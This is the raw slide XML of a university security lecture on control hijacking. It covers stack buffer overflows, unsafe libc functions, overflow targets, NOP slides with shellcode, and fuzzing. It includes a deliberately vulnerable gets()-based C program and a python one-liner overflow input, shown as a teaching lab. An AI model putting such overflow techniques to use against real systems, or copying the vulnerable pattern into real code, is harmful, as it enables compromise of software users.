            <a:off x="8511967" y="514351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5842552" y="514351"/>
            <a:ext cx="24848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0" name="Freeform 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5121748" y="2038350"/>
            <a:ext cx="732952" cy="1047750"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 732952 w 732952"/>
              <a:gd name="connsiteY0" fmla="*/ 1155700 h 1155700"/>
              <a:gd name="connsiteX1" fmla="*/ 466252 w 732952"/>
              <a:gd name="connsiteY1" fmla="*/ 965200 h 1155700"/>
              <a:gd name="connsiteX2" fmla="*/ 47152 w 732952"/>
              <a:gd name="connsiteY2" fmla="*/ 635000 h 1155700"/>
              <a:gd name="connsiteX3" fmla="*/ 72552 w 732952"/>
              <a:gd name="connsiteY3" fmla="*/ 203200 h 1155700"/>
              <a:gd name="connsiteX4" fmla="*/ 605952 w 732952"/>
              <a:gd name="connsiteY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952" h="1155700">
                <a:moveTo>
                  <a:pt x="732952" y="1155700"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="656752" y="1103841"/>
                  <a:pt x="580552" y="1051983"/>
                  <a:pt x="466252" y="965200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="351952" y="878417"/>
                  <a:pt x="112769" y="762000"/>
                  <a:pt x="47152" y="635000"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-18465" y="508000"/>
                  <a:pt x="-20581" y="309033"/>
                  <a:pt x="72552" y="203200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="165685" y="97367"/>
                  <a:pt x="605952" y="0"/>
                  <a:pt x="605952" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5715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842552" y="2533651"/>
            <a:ext cx="26670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8509553" y="4243389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8511967" y="514351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915400" y="895350"/>
            <a:ext cx="0" cy="36576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19625" y="4476750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19623" y="59055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68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z="4400" dirty="0" smtClean="0"/>
              <a:t>Details and examples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971550"/>
            <a:ext cx="8915400" cy="417195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sz="2800" dirty="0" smtClean="0"/>
              <a:t>Some complications:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Program   P  should not contain the ‘\0’  character.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Overflow should not crash program before  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>()  exits.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>https://www.us-cert.gov/ncas/alerts/TA16-187A</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="100000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>(in)Famous </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="sng" dirty="0" smtClean="0"/>
              <a:t>remote</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> stack smashing overflows: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(2007)  Overflow in Windows animated cursors (ANI).     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LoadAniIcon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
              </a:rPr>
              <a:t>() https://www.sans.org/reading-room/whitepapers/threats/ani-vulnerability-history-repeats-1926</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000090"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>(2005)  Overflow in Symantec Virus Detection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>test.GetPrivateProfileString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>  "file", 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[long string]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="6151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1: Control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Total 6 Modules on Control Hijacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Module 1.1: Basic Control Hijacking Attacks : Buffer Overflow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Module 1.2: Integer Overflow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Module 1.3: Formal String Vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Module 1.4: Defenses Against Control Hijacking – Platform Based Defenses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Module 1.5: Run-Time Defenses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Module 1.6: Some Advanced Control Hijacking Attacks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657350"/>
            <a:ext cx="76200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3028950"/>
            <a:ext cx="76200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Many unsafe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1" smtClean="0"/>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" smtClean="0"/>
              <a:t> functions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42481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strcpy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(char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>dest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>,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strcat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(char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>dest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean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90"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gets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(char *s)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scanf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*format, … )           and many more.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1920"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>“Safe” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> versions  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strncpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strncat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
              </a:rPr>
              <a:t>()  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>are misleading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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strncpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
              </a:rPr>
              <a:t>()   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>may leave string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>unterminated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="2424"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Windows C run time  (CRT):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="624"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strcpy_s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>:   ensures proper termination</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="3366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2927350"/>
            <a:ext cx="868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" y="3994150"/>
            <a:ext cx="868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06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Buffer overflow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" smtClean="0"/>
              <a:t>opportunities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895350"/>
            <a:ext cx="8839200" cy="4095750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250950" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Exception handlers:     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>(Windows SEH attacks)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="744538" lvl="1" indent="-287338">
              <a:tabLst>
                <a:tab pos="1250950" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Overwrite the address of an exception handler in stack frame.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="1250950" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="1250950" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Function pointers:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>(e.g.  PHP 4.0.2,   MS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>MediaPlayer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> Bitmaps)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="1250950" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="744538" lvl="1" indent="-287338">
              <a:spcBef>
                <a:spcPct val="130000"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="1250950" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1144588" lvl="2" indent="-287338">
              <a:spcBef>
                <a:spcPct val="130000"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="1250950" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Overflowing  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  will override function pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="744538" lvl="1" indent="-287338">
              <a:spcBef>
                <a:spcPct val="130000"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="1250950" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>Longjmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> buffers:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>longjmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>(pos)         (e.g. Perl </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>5.003)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1144588" lvl="2" indent="-287338">
              <a:tabLst>
                <a:tab pos="1250950" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Overflowing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> next to pos overrides value of pos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a: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76451" y="2800351"/>
            <a:ext cx="5616575" cy="757239"/>
            <a:chOff x="816" y="2400"/>
            <a:chExt cx="3538" cy="636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3393" y="2540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3393" y="2777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816" y="2543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816" y="2777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3928" y="2400"/>
              <a:ext cx="426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dirty="0"/>
                <a:t>Heap</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="1800" dirty="0"/>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="1800" dirty="0"/>
                <a:t>or</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="1800" dirty="0"/>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="1800" dirty="0"/>
                <a:t>stack</a:t>
              </a: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343" y="2543"/>
              <a:ext cx="1714" cy="23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dirty="0"/>
                <a:t>             </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>buf</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1800" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>[128]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3057" y="2540"/>
              <a:ext cx="543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err="1">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>FuncPtr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585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Corrupting method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9650"/>
            <a:ext cx="84582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After overflow of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 smtClean="0"/>
              <a:t> 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5254" y="2385967"/>
            <a:ext cx="83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1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3" y="1600200"/>
            <a:ext cx="12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1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3" y="1908072"/>
            <a:ext cx="12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45092" y="2272630"/>
            <a:ext cx="990600" cy="94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3" y="2228850"/>
            <a:ext cx="12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409951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5"/>
            <a:ext cx="1676400" cy="426482"/>
            <a:chOff x="2971800" y="6324600"/>
            <a:chExt cx="1676400" cy="568643"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42" name="Left Brace 4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6600" y="6400800"/>
              <a:ext cx="94929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81000" y="4057651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" y="468511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9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65" name="Straight Arrow Connector 64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60"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="838200" y="2971800"/>
            <a:ext cx="8001000" cy="1714500"/>
            <a:chOff x="838200" y="3962400"/>
            <a:chExt cx="8001000" cy="2286000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="Rectangle 35"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="838200" y="5410200"/>
              <a:ext cx="2590800" cy="838200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF0000">
                <a:alpha val="6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6400" y="3962400"/>
              <a:ext cx="2209800" cy="685800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NOP</a:t>
              </a:r>
              <a:b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slide</a:t>
              </a:r>
              <a:endPara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696200" y="3962400"/>
              <a:ext cx="1143000" cy="685800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shell</a:t>
              </a:r>
              <a:b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code</a:t>
              </a:r>
              <a:endPara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 flipV="1">
              <a:off x="3201194" y="4749800"/>
              <a:ext cx="3199606" cy="6604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373707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Poor man’s Buffer Overflow Finding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763000" cy="3657600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="280988" indent="-280988">
              <a:tabLst>
                <a:tab pos="966788" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>To find overflow: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Run web server on local machine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Issue malformed requests (ending with   “$$$$$” )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1025525" lvl="2" indent="-230188">
              <a:tabLst>
                <a:tab pos="966788" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many automated tools exist  (called  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>fuzzers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)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If web server crashes,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>	search core dump for  “$$$$$” to find overflow location</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="280988" indent="-280988">
              <a:tabLst>
                <a:tab pos="966788" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Construct exploit    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>(not easy given latest defenses)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="31884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1.1: Control Hijacking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Stack Smashing, Integer Overflow, Formal String attacks, Heap Based Attacks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Boneh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (Stanford University)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>John C. Mitchell (Stanford University)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Nicolai </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Zeldovich</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (MIT)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Jungmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Park (Virginia Tech)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Patrick Schaumont (Virginia Tech)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Web Resources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657600" y="2743200"/>
            <a:ext cx="5029200" cy="1657349"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"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Control Hijacking Attacks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01742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02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00100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stdlib.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>&gt; 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unistd.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>&gt; 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 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty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argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>, char **</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>) { </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>volatile </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> modified; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>char buffer[64]; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>modified = 0; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>gets(buffer); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>if(modified != 0) { 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("you have changed the 'modified' variable\n"); 	} </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>else { </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>("Try again?\n"); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>} 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142875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$echo `python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c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'print("A"*64)'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>`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 smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ./stack0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Try again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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>echo `python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c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'print("A"*65)'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>`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 smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ./stack0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you have changed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'modified'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variable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90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590550"/>
          <a:ext cx="6300788" cy="3465513"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <p:oleObj spid="_x0000_s1026" name="Wordpad Document" r:id="rId3" imgW="5486400" imgH="4027680" progId="WordPad.Document.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4229101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$./`python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c </a:t>
            </a:r>
            <a:r>
